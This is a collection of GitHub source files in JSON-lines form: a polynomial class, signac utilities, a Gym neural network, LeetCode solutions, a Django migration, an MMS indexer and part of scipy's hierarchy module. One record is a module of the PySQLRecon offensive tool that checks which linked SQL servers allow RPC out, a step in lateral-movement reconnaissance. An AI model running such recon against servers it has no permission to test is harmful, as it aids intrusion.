\r\n    def __str__(self):\r\n        def term(c,p,var):\r\n            return (str(c) if p == 0 or c != 1 else '') +\\\r\n                   ('' if p == 0 else var+('^'+str(p) if p != 1 else ''))\r\n        if len(self.terms) == 0:\r\n            return '0'\r\n        else:\r\n            return ' + '.join([term(c,p,'x') for p,c in sorted(self.terms.items(),reverse=True)]).replace('+ -','- ')\r\n    \r\n    def __repr__(self):\r\n        return \"Poly(\" + \",\".join([str((x[1], x[0])) for x in self.terms.items()]) + \")\"\r\n\r\n    \r\n    def __len__(self):\r\n        if self.terms == {}:\r\n            return 0\r\n        return max([x for x in self.terms])\r\n    \r\n    \r\n    def __call__(self,arg):\r\n        assert type(arg) is int or type(arg) is float, (\"Poly.__call__: illegal arg:\", arg)\r\n        result = 0\r\n        for k in self.terms:\r\n            result += arg ** k * self.terms[k]\r\n        return result\r\n    \r\n\r\n    def __iter__(self):\r\n        for k in sorted(self.terms, reverse=True):\r\n            yield (self.terms[k], k)\r\n    \r\n\r\n    def __getitem__(self,index):\r\n        self._checkIndexLegality(index, \"__getitem__\")\r\n        if index not in self.terms:\r\n            return 0\r\n        return self.terms[index]\r\n    \r\n\r\n    def __setitem__(self,index,value):\r\n        self._checkIndexLegality(index, \"__setitem__\")\r\n        if value == 0 and index in self.terms:\r\n            del self.terms[index]\r\n        elif value != 0:\r\n            self.terms[index] = value\r\n    \r\n\r\n    def __delitem__(self,index):\r\n        self._checkIndexLegality(index, \"__delitem__\")\r\n        if index in self.terms:\r\n            del self.terms[index]\r\n    \r\n    def _checkIndexLegality(self, index, functionName):\r\n        if index < 0 or type(index) is not int:\r\n            raise TypeError(\"Poly.\" + functionName+\": illegal index \" + str(index))\r\n    \r\n\r\n    def _add_term(self,c,p):\r\n        if type(c) is not int and type(c) is not float:\r\n            raise TypeError(\"Poly._add_term: illegal coefficient\", c)\r\n        if type(p) is not int or p < 0:\r\n            raise TypeError(\"Poly._add_term: illegal power\", p)\r\n        if p not in self.terms and c != 0:\r\n            self.terms[p] = c\r\n        elif p in self.terms:\r\n            self.terms[p] += c\r\n        if p in self.terms and self.terms[p] == 0:\r\n            del self.terms[p]\r\n    \r\n\r\n    def __add__(self,right):\r\n        self._checkArithmeticCompatibility(right, \"__add__\")\r\n        return self._add_into_self(right)\r\n\r\n    \r\n    def __radd__(self,left):\r\n        self._checkArithmeticCompatibility(left, \"__radd__\")\r\n        return self._add_into_self(left)\r\n    \r\n\r\n    def __mul__(self,right):\r\n        self._checkArithmeticCompatibility(right, \"__mul__\")\r\n        return self._mul_into_self(right)\r\n\r\n    def __rmul__(self,left):\r\n        self._checkArithmeticCompatibility(left, \"__rmul__\")\r\n        return self._mul_into_self(left)\r\n    \r\n    def _mul_into_self(self, term):\r\n        result = Poly()\r\n        if type(term) is Poly:\r\n            for x in self.terms.items():\r\n                for y in term.terms.items():\r\n                    result._add_term(x[1] * y[1], x[0] + y[0])\r\n        else:\r\n            for x in self.terms.items():\r\n                result._add_term(term * x[1], x[0])\r\n        return result\r\n    \r\n    \r\n    def _add_into_self(self, term):\r\n        result = Poly(*[(x[1], x[0]) for x in self.terms.items()])\r\n        if type(term) is Poly:\r\n            for x in term:\r\n                result._add_term(x[0], x[1])\r\n        else:\r\n            result._add_term(term, 0)\r\n        return result\r\n    \r\n    def _checkArithmeticCompatibility(self, operand, functionName):\r\n        if type(operand) is not int and type(operand) is not float and type(operand) is not Poly:\r\n            raise TypeError(\"Poly.\" + functionName + \": illegal operand: \" + str(operand))\r\n\r\n    def __eq__(self,right):\r\n        self._checkArithmeticCompatibility(right, \"__eq__\")\r\n        if type(right) is Poly:\r\n            #compare the term dicts directly so extra terms on either side count\r\n            return self.terms == right.terms\r\n        return self.terms.get(0, 0) == right #a Poly with no constant term acts as 0\r\n\r\n    \r\nif __name__ == '__main__':\r\n    # Some simple tests; you can comment them out and/or add your own before\r\n    # the driver is called.\r\n    print('Start simple tests')\r\n    p = Poly((3,2),(-2,1), (4,0))\r\n    print(' For Polynomial: 3x^2 - 2x + 4')\r\n    print(' str(p):',p)\r\n    print(' repr(p):',repr(p))\r\n    print(' len(p):',len(p))\r\n    print(' p(2):',p(2))\r\n    print(' list collecting iterator results:',[t for t in p])\r\n    print(' p+p:',p+p)\r\n    print(' p+2:',p+2)\r\n    print(' p*p:',p*p)\r\n    print(' p*2:',p*2)\r\n    print('End simple tests\\n')\r\n    \r\n    import driver\r\n    #driver.default_show_exception=True\r\n    #driver.default_show_exception_message=True\r\n    #driver.default_show_traceback=True\r\n    driver.driver()","repo_name":"solomc1/python","sub_path":"ics 33/solutions/ile2 solutions/Lab 2/LongNicholas/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":6051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"19932699768","text":"import argparse\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom itertools import cycle, islice\n\n\ndef _positive_int(value):\n    \"\"\"Expect a command line argument to be a positive integer.\n\n    Designed to be used in conjunction with an argparse.ArgumentParser.\n\n    :param value:\n        This function will raise an argparse.ArgumentTypeError if value\n        is not a positive integer.\n    :raises:\n        :class:`argparse.ArgumentTypeError`\n    \"\"\"\n    try:\n        ivalue = int(value)\n        if ivalue <= 0:\n            raise argparse.ArgumentTypeError(\"Value must be positive.\")\n    except (TypeError, ValueError):\n        raise argparse.ArgumentTypeError(f\"{value} must be a positive integer.\")\n    return ivalue\n\n\n@contextmanager\ndef redirect_log(job, filename=\"run.log\", formatter=None, logger=None):\n    \"\"\"Redirect all messages logged via the logging interface to the given file.\n\n    :param job:\n        An instance of a signac job.\n    :type job:\n        :class:`signac.Project.Job`\n    :param formatter:\n        The logging formatter to use, uses a default formatter if this argument\n        is not provided.\n    :type formatter:\n        :class:`logging.Formatter`\n    :param logger:\n        The instance of logger to which the new file log handler is added. 
Defaults\n        to the default logger returned by `logging.getLogger()` if this argument is\n        not provided.\n    :type logger:\n        :class:`logging.Logger`\n    \"\"\"\n    if formatter is None:\n        formatter = logging.Formatter(\n            \"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\"\n        )\n    if logger is None:\n        logger = logging.getLogger()\n\n    filehandler = logging.FileHandler(filename=job.fn(filename))\n    filehandler.setFormatter(formatter)\n    logger.addHandler(filehandler)\n    try:\n        yield\n    finally:\n        logger.removeHandler(filehandler)\n\n\n@contextmanager\ndef add_path_to_environment_pythonpath(path):\n    \"Temporarily insert the given path into the environment PYTHONPATH variable.\"\n    path = os.path.realpath(path)\n    pythonpath = os.environ.get(\"PYTHONPATH\")\n    if pythonpath:\n        for path_ in pythonpath.split(\":\"):\n            if os.path.isabs(path_) and os.path.realpath(path_) == path:\n                yield  # Path is already in PYTHONPATH, nothing to do here.\n                return\n        try:\n            # Prepend the given path to the PYTHONPATH.\n            tmp_path = [path] + pythonpath.split(\":\")\n            os.environ[\"PYTHONPATH\"] = \":\".join(tmp_path)\n            yield\n        finally:\n            os.environ[\"PYTHONPATH\"] = pythonpath\n    else:\n        try:\n            # The PYTHONPATH was previously not set; set it to the given path.\n            os.environ[\"PYTHONPATH\"] = path\n            yield\n        finally:\n            del os.environ[\"PYTHONPATH\"]\n\n\n@contextmanager\ndef add_cwd_to_environment_pythonpath():\n    with add_path_to_environment_pythonpath(os.getcwd()):\n        yield\n\n\n@contextmanager\ndef switch_to_directory(root=None):\n    \"Temporarily switch into the given root directory (if not None).\"\n    if root is None:\n        yield\n    else:\n        cwd = os.getcwd()\n        try:\n            os.chdir(root)\n            yield\n        finally:\n            os.chdir(cwd)\n\n\nclass TrackGetItemDict(dict):\n    \"A dict that keeps track of which keys were accessed via __getitem__.\"\n\n    def __init__(self, *args, **kwargs):\n        self._keys_used = set()\n        super().__init__(*args, **kwargs)\n\n    def __getitem__(self, key):\n        self._keys_used.add(key)\n        return super().__getitem__(key)\n\n    def get(self, key, default=None):\n        self._keys_used.add(key)\n        return super().get(key, default)\n\n    @property\n    def keys_used(self):\n        \"Return all keys that have been accessed.\"\n        return self._keys_used.copy()\n\n\ndef roundrobin(*iterables):\n    # From: https://docs.python.org/3/library/itertools.html#itertools-recipes\n    # roundrobin('ABC', 'D', 'EF') --> A D E B F C\n    # Recipe credited to George Sakkis\n    num_active = len(iterables)\n    nexts = cycle(iter(it).__next__ for it in iterables)\n    while num_active:\n        try:\n            for next in nexts:\n                yield next()\n        except StopIteration:\n            # Remove the iterator we just exhausted from the cycle.\n            num_active -= 1\n            nexts = cycle(islice(nexts, num_active))\n\n\nclass _hashable_dict(dict):\n    def __hash__(self):\n        return hash(tuple(sorted(self.items())))\n\n\ndef to_hashable(obj):\n    # if isinstance(l, Sequence):\n    if type(obj) == list:\n        return tuple(to_hashable(_) for _ in obj)\n    elif type(obj) == dict:\n        return _hashable_dict(obj)\n    else:\n        return obj\n","repo_name":"shandave/signac-flow","sub_path":"flow/util/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"}
{"seq_id":"15582135796","text":"import gym\nimport numpy as np\n\n# Setting seed\nnp.random.seed(42)\n\n\nclass Network:\n    \"\"\"\n    A self-made neural-network implementation of a two-layer perceptron with an evolutionary update.\n    Made specifically to work in a Gym environment.\n    \"\"\"\n\n    def 
__init__(self, env, n_hidden, p_variance=0.1):\n self.p_variance = p_variance\n self.env = env\n self.n_hidden = n_hidden\n\n self.n_inputs = env.observation_space.shape[0]\n self.n_outputs = env.action_space.shape[0] if isinstance(env.action_space, gym.spaces.box.Box) \\\n else env.action_space.n\n\n self._params = Network.gen_rand_params(self.n_inputs, self.n_outputs, n_hidden, p_variance)\n\n @staticmethod\n def gen_rand_params(n_inputs, n_outputs, n_hidden, p_variance):\n # Initializing params for two-layer perceptron\n w1 = np.random.randn(n_hidden, n_inputs) * p_variance # first connection layer\n w2 = np.random.randn(n_outputs, n_hidden) * p_variance # second connection layer\n b1 = np.zeros(shape=(n_hidden, 1)) # bias internal neurons\n b2 = np.zeros(shape=(n_outputs, 1)) # bias motor neurons\n\n return [(w1, b1), (w2, b2)]\n\n def propagate(self, obs):\n obs.resize(self.n_inputs, 1)\n\n # Propagating through network\n (w1, b1), (w2, b2) = self._params\n z1 = np.dot(w1, obs) + b1\n a1 = np.tanh(z1)\n z2 = np.dot(w2, a1) + b2\n a2 = np.tanh(z2)\n\n # Selecting action\n if isinstance(self.env.action_space, gym.spaces.box.Box):\n action = a2\n else:\n action = np.argmax(a2)\n return action\n\n def evaluate(self, n_episodes, render=False):\n fitness = 0.0\n for e in range(n_episodes):\n observation = self.env.reset()\n done = False\n while not done:\n action = self.propagate(observation)\n observation, reward, done, info = self.env.step(action)\n fitness += reward\n if render:\n self.env.render()\n return fitness/n_episodes\n\n def get_params(self):\n return self._params\n\n def set_params(self, params):\n self._params = params\n\n\nif \"__main__\" in __name__:\n env = gym.make('CartPole-v0')\n network = Network(env, 5)\n n_episodes = 10\n\n fitness_av = network.evaluate(n_episodes)\n print(f\"Fitness average: {fitness_av}\")\n\n env.close()\n","repo_name":"quarriedstone/BehavioralRobotics2021","sub_path":"Lab2/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10620051625","text":"#!/usr/bin/python\n\nimport unittest\nimport sys\nsys.path.insert(0, '../src')\n\nfrom Abilities import Ability\n\n\nclass AbilityTest(unittest.TestCase):\n def setUp(self):\n self.sut = Ability()\n\n def test_name(self):\n test_name = 'None'\n self.assertEqual(test_name, self.sut.name)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jaycarson/fun","sub_path":"app/tst/AbilityTests.py","file_name":"AbilityTests.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31110892484","text":"#https://leetcode.com/problems/roman-to-integer/submissions/\n\"\"\"\nTime Complexity: O(n)\n\nStart loop from the last index if the current element is smaller than the\nsucceeding element subtract it from the finValue else add it to the finvalue\n\"\"\"\ndef romanToInt(s):\n vals = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n finVal = vals[s[-1]]\n for i in range(len(s)-2,-1,-1):\n if vals[s[i]]>=vals[s[i+1]]:\n finVal+=vals[s[i]]\n else:\n finVal-=vals[s[i]]\n return finVal","repo_name":"sparsh-m/30days","sub_path":"d15_3.py","file_name":"d15_3.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4347576874","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom 
PyQt5.QtWidgets import QApplication\nimport sys\nimport dev\n\nclass ExampleApp(QtWidgets.QMainWindow, dev.Ui_Dialog):\n def __init__(self, parent=None):\n super(ExampleApp, self).__init__(parent)\n self.setupUi(self)\n\ndef main():\n app = QApplication(sys.argv)\n form = ExampleApp()\n form.showFullScreen()\n app.exec_()\n\nif __name__ == '__main__':\n main()","repo_name":"Red-Hide/ZeroP_Software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5952274651","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('anagrafiche', '0125_fatturacliente_da_confermare'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='bollacliente',\n name='oggetto',\n field=models.CharField(blank=True, null=True, max_length=150),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fatturacliente',\n name='oggetto',\n field=models.CharField(blank=True, null=True, max_length=150),\n preserve_default=True,\n ),\n ]\n","repo_name":"ghiblin/wms2","sub_path":"anagrafiche/migrations/0126_auto_20151007_1438.py","file_name":"0126_auto_20151007_1438.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9514969827","text":"\"\"\" Create indexes for the on-disk media files \"\"\"\nimport datetime\nimport html\nimport logging\nfrom os import listdir, path\n\nfrom jinja2 import Environment, FileSystemLoader\n\nclass Indexer():\n def __init__(self):\n self.env = env = Environment(\n loader=FileSystemLoader(searchpath=\"html/\" )\n )\n\n def generate_local_index(self, base_path):\n mms = self._get_local_files(base_path)\n\n template = self.env.get_template(\"local-index.html\")\n index_path = path.join(base_path, \"index.html\")\n self._write_file(\n template.render(\n time = mms['time'],\n images = mms['images'],\n texts = mms['texts'],\n all_files = mms['all_files']\n ),\n index_path\n )\n\n def generate_global_index(self, base_path, filename = \"mms.html\"):\n all_mms = []\n\n for f in listdir(base_path):\n local_path = path.join(base_path, f)\n if not path.isdir(local_path):\n continue\n\n mms = self._get_local_files(\n local_path,\n prepend_path = f\n )\n\n if not len(mms['all_files']):\n continue\n\n all_mms.append(mms)\n\n all_mms = sorted(all_mms, key = lambda mms: mms['time'], reverse = True)\n\n template = self.env.get_template(\"global-index.html\")\n index_path = path.join(base_path, filename)\n self._write_file(\n template.render(\n all_mms = all_mms\n ),\n index_path\n )\n\n def reindex_all(self, base_path):\n for f in listdir(base_path):\n full_path = path.join(base_path, f)\n if path.isdir(full_path):\n self.generate_local_index(full_path)\n\n self.generate_global_index(base_path)\n\n def _get_local_files(self, local_path, prepend_path = None):\n images = []\n texts = []\n all_files = []\n time = None\n\n for f in listdir(local_path):\n full_path = path.join(local_path, f)\n if not path.isfile(full_path):\n continue\n\n if f == 'index.html':\n continue\n\n if not time:\n time = datetime.datetime.fromtimestamp(\n path.getmtime(full_path)\n ).strftime('%Y-%m-%d %H:%M:%S')\n\n file_info = {\n 'name': f,\n 'relpath': path.join(prepend_path, f) if prepend_path else f\n }\n\n all_files.append(file_info)\n\n ext = 
path.splitext(f)[1].lower()\n            if ext in ['.jpg', '.jpeg', '.png', '.gif']:\n                images.append(file_info)\n            elif ext == '.txt':\n                try:\n                    # use a handle name that does not shadow the loop variable f\n                    with open(full_path, 'r') as textfile:\n                        data = html.escape(textfile.read())\n                    texts.append(\n                        \"
\".join(data.splitlines())\n )\n except OSError:\n logging.exception(\"Failed to read file %s\" % full_path)\n\n return {\n 'relpath': prepend_path,\n 'time': time,\n 'images': images,\n 'texts': texts,\n 'all_files': all_files\n }\n\n def _write_file(self, data, path):\n with open(path, 'w') as f:\n f.write(data)\n","repo_name":"gylle/sms900","sub_path":"sms900/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41953930064","text":"import typer\n\nfrom pysqlrecon.logger import logger\nfrom pysqlrecon.lib import PySqlRecon\n\napp = typer.Typer()\nCOMMAND_NAME = \"checkrpc\"\nHELP = \"[bright_black][NORM][/] Enumerate RPC status of linked servers [I,L]\"\nLINK_COMPATIBLE = True\nIMPERSONATE_COMPATIBLE = True\n\n\n@app.callback(invoke_without_command=True)\ndef main(ctx: typer.Context):\n \n pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']\n use_basic_tables = ctx.obj['basic_tables']\n\n # verify opts are compatible with module before connecting\n if not PySqlRecon.validate_opts(\n LINK_COMPATIBLE,\n IMPERSONATE_COMPATIBLE,\n pysqlrecon.link,\n pysqlrecon.impersonate\n ):\n exit()\n\n pysqlrecon.connect()\n\n if pysqlrecon.link is not None:\n logger.info(f\"Enumerating RPC status of linked servers on {pysqlrecon.link} via {pysqlrecon.target}\")\n else:\n logger.info(f\"Enumerating RPC status of linked servers on {pysqlrecon.target}\")\n\n query = \"SELECT name, is_rpc_out_enabled FROM sys.servers\"\n pysqlrecon.query_handler(query)\n pysqlrecon.print_results(use_basic_tables)\n\n pysqlrecon.disconnect()\n","repo_name":"Tw1sm/PySQLRecon","sub_path":"pysqlrecon/modules/checkrpc.py","file_name":"checkrpc.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"57"} +{"seq_id":"30413025748","text":"class TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution(object):\n def maxProduct(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n MODULA = 10 ** 9 + 7\n\n self.totals = list()\n def getSum(node):\n total = node.val\n\n if node.left:\n total += getSum(node.left)\n\n if node.right:\n total += getSum(node.right)\n\n self.totals.append(total)\n return total\n\n sumi = getSum(root)\n\n ans = 0\n for total in self.totals:\n ans = max(ans, total * (sumi - total))\n return ans % MODULA\n\n\n\"\"\"\nnode = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\n\nnode.left = node2\nnode.right = node3\nnode2.left = node4\nnode2.right = node5\nnode3.left = node6\n\"\"\"\n\nnode = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\n\nnode.right = node2\nnode2.left = node3\nnode2.right = node4\nnode4.left = node5\nnode4.right = node6\n\nsolution = Solution()\nprint(solution.maxProduct(node))\n","repo_name":"David-Tong/leetcode-in-python","sub_path":"1339-maximum product of splitted binary tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38870896791","text":"import warnings\nimport bisect\nfrom collections import deque\n\nimport numpy as np\nfrom . 
import _hierarchy, _optimal_leaf_ordering\nimport scipy.spatial.distance as distance\nfrom scipy._lib._array_api import array_namespace, as_xparray, copy\nfrom scipy._lib._disjoint_set import DisjointSet\n\n\n_LINKAGE_METHODS = {'single': 0, 'complete': 1, 'average': 2, 'centroid': 3,\n 'median': 4, 'ward': 5, 'weighted': 6}\n_EUCLIDEAN_METHODS = ('centroid', 'median', 'ward')\n\n__all__ = ['ClusterNode', 'DisjointSet', 'average', 'centroid', 'complete',\n 'cophenet', 'correspond', 'cut_tree', 'dendrogram', 'fcluster',\n 'fclusterdata', 'from_mlab_linkage', 'inconsistent',\n 'is_isomorphic', 'is_monotonic', 'is_valid_im', 'is_valid_linkage',\n 'leaders', 'leaves_list', 'linkage', 'maxRstat', 'maxdists',\n 'maxinconsts', 'median', 'num_obs_linkage', 'optimal_leaf_ordering',\n 'set_link_color_palette', 'single', 'to_mlab_linkage', 'to_tree',\n 'ward', 'weighted']\n\n\nclass ClusterWarning(UserWarning):\n pass\n\n\ndef _warning(s):\n warnings.warn('scipy.cluster: %s' % s, ClusterWarning, stacklevel=3)\n\n\ndef int_floor(arr, xp):\n # numpy.array_api is strict about not allowing `int()` on a float array.\n # That's typically not needed, here it is - so explicitly convert\n return int(xp.astype(arr, xp.int64))\n\n\ndef single(y):\n \"\"\"\n Perform single/min/nearest linkage on the condensed distance matrix ``y``.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n The linkage matrix.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import single, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = single(y)\n >>> Z\n array([[ 0., 1., 1., 2.],\n [ 2., 12., 1., 3.],\n [ 3., 4., 1., 2.],\n [ 5., 14., 1., 3.],\n [ 6., 7., 1., 2.],\n [ 8., 16., 1., 3.],\n [ 9., 10., 1., 2.],\n [11., 18., 1., 3.],\n [13., 15., 2., 6.],\n [17., 20., 2., 9.],\n [19., 21., 2., 12.]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 4, 5, 6, 1, 2, 3], dtype=int32)\n >>> fcluster(Z, 1, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n \"\"\"\n return linkage(y, method='single', metric='euclidean')\n\n\ndef complete(y):\n \"\"\"\n Perform complete/max/farthest point linkage on a condensed distance matrix.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. 
See\n the `linkage` function documentation for more information\n on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import complete, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = complete(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.41421356, 3. ],\n [ 5. , 13. , 1.41421356, 3. ],\n [ 8. , 14. , 1.41421356, 3. ],\n [11. , 15. , 1.41421356, 3. ],\n [16. , 17. , 4.12310563, 6. ],\n [18. , 19. , 4.12310563, 6. ],\n [20. , 21. , 5.65685425, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 4.5, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n \"\"\"\n return linkage(y, method='complete', metric='euclidean')\n\n\ndef average(y):\n \"\"\"\n Perform average/UPGMA linkage on a condensed distance matrix.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n `linkage` for more information on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import average, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = average(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.20710678, 3. ],\n [ 5. , 13. , 1.20710678, 3. ],\n [ 8. , 14. , 1.20710678, 3. ],\n [11. , 15. , 1.20710678, 3. ],\n [16. , 17. , 3.39675184, 6. ],\n [18. , 19. , 3.39675184, 6. ],\n [20. , 21. , 4.09206523, 12. 
]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='average', metric='euclidean')\n\n\ndef weighted(y):\n \"\"\"\n Perform weighted/WPGMA linkage on the condensed distance matrix.\n\n See `linkage` for more information on the return\n structure and algorithm.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n `linkage` for more information on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import weighted, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = weighted(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 11. , 1. , 2. ],\n [ 2. , 12. , 1.20710678, 3. ],\n [ 8. , 13. , 1.20710678, 3. ],\n [ 5. , 14. , 1.20710678, 3. ],\n [10. , 15. , 1.20710678, 3. ],\n [18. , 19. , 3.05595762, 6. ],\n [16. , 17. , 3.32379407, 6. ],\n [20. , 21. , 4.06357713, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial 